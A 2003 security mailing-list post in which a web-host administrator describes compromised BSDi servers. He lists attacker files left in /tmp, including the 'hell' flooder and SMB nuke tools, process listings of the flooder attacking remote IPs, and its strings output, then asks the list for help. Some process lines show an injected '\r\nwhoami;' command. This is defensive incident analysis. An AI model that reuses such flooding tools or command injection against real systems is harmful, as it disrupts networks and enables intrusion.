From: Dayne Jordan (djordancompleteweb.net)
Date: Wed Jul 02 2003 - 13:08:25 CDT

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Greetings,

Over the past 2 days we were alerted to 2 machines doing over 10mbits/sec
each. Upon further investigation here is what we found...

Lets start with OS and essentials:
=====================================
- BSDi 4.2, patched current
- Apache 1.3.27 (running as nobody:nobody) non-suexec
- PHP-4.3.2 (allow_uploads=Off)

We have found v2k.tar uploaded to /tmp/ and a new directory: /tmp/v/.

su-2.02# ls -la /tmp
drwxrwxrwt 2 root wheel 2560 Jul 2 13:40 .
drwxr-xr-x 17 root wheel 512 Nov 3 2002 ..
-rw-r--r-- 1 nobody wheel 1762550 Jul 2 12:07 iprot-ip_log
-rw-r--r-- 1 nobody wheel 739326 Jul 2 11:13 iprot-user_log
-rw-r--r-- 1 nobody wheel 16384 Jul 2 13:48 iprot.db
srwxrwxrwx 1 root wheel 0 Apr 29 02:16 mysql.sock
drwxr-xr-x 3 nobody wheel 512 Oct 9 2002 v
-rw-r--r-- 1 nobody wheel 253952 Jul 2 09:21 v2k.tar

Contents of /tmp/v:

su-2.02# ls -lR
total 164
-rwxr-xr-x 1 nobody wheel 13157 Nov 28 2002 hell
-rw-r--r-- 1 nobody wheel 102400 Sep 13 2002 k.tar
drwxr-xr-x 2 nobody wheel 512 Nov 28 2002 netbios
-rwxr-xr-x 1 nobody wheel 21866 Oct 9 2002 usg
-rwxr-xr-x 1 nobody wheel 15807 Nov 8 2002 vadimI

./netbios:
total 94
-rwxr-xr-x 1 nobody wheel 53760 Nov 28 2002 nbtscan
-rwxr-xr-x 1 nobody wheel 18070 Nov 28 2002 smbkill
-rwxr-xr-x 1 nobody wheel 23305 Nov 28 2002 smbnuke

The program found running was 'hell':
An excerpt from ps aux/axl:

nobody 3981 1 252 22385e0 0 I ?? 0:00.01 sh -c v/hell 62.221.xxx.xx 110 2>&1
nobody 3982 3981 252 22385e0 0 RN ?? 10:17.28 v/hell 62.221.xxx.xx 110
nobody 4002 1 252 22385e0 0 I ?? 0:00.07 sh -c v/hell 62.221.xxx.xx 110 2>&1
nobody 4003 4002 252 22385e0 0 R ?? 9:53.19 v/hell 62.221.xxx.xx 110
nobody 4033 1 252 22385e0 0 I ?? 0:00.09 sh -c v/hell 202.8.xxx.xxx 110 2>&1
nobody 4034 4033 252 22385e0 0 R ?? 8:18.19 v/hell 202.8.xxx.xxx 110
nobody 4051 1 252 22385e0 0 I ?? 0:00.08 sh -c v/hell 202.8.xxx.xxx 110 2>&1
nobody 4052 4051 252 22385e0 0 R ?? 7:40.63 v/hell 202.8.xxx.xxx 110
nobody 4122 1 252 22385e0 0 I ?? 0:00.04 sh -c v/hell 202.73.xxx.xxx 110\r\nwhoami; 2>&1
nobody 4179 1 252 22385e0 0 I ?? 0:00.06 sh -c v/hell 202.73.xxx.xxx 110\r\nwhoami; 2>&1
nobody 4180 4179 252 22385e0 0 R ?? 4:43.55 v/hell 202.73.xxx.xxx 110\r
nobody 4213 1 252 22385e0 0 I ?? 0:00.05 sh -c v/hell 66.151.xx.xx 110\r\nwhoami; 2>&1

su-2.02# strings hell
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
printf
connect
socket
bzero
send
__deregister_frame_info
bcopy
gethostbyname
htons
exit
atoi
_IO_stdin_used
__libc_start_main
__register_frame_info
GLIBC_2.0
PTRh
Bombing %s, port %d
Unknown host: %s
Syntax: ./hell host port
Port can be any port, any of them work equally well
FUCKER!!!!
su-2.02#

-System binaries are fine checking via known good BSDi 4.2 machines md5 output
-Nothing unusual running via netstat/sockstat
-Scanned externally for anything rogue listening - 0 found.
-root/admin accounts are not compromised

The v2k.tar date/time was 09:21 July 2nd, 2003. A grep thru all the webserver
logs for 1-2 minutes on either side of that time do not reveal any unusual
requests that would look like an overflow type string that we've seen attempted
in the past.

Any clues?

D.
===========

----------------------------------------------------------------------------
Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the
world's premier technical IT security event! 10 tracks, 15 training sessions,
1,800 delegates from 30 nations including all of the top experts, from CSO's to
"underground" security specialists. See for yourself what the buzz is about!
Early-bird registration ends July 3. This event will sell out. www.blackhat.com
----------------------------------------------------------------------------

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]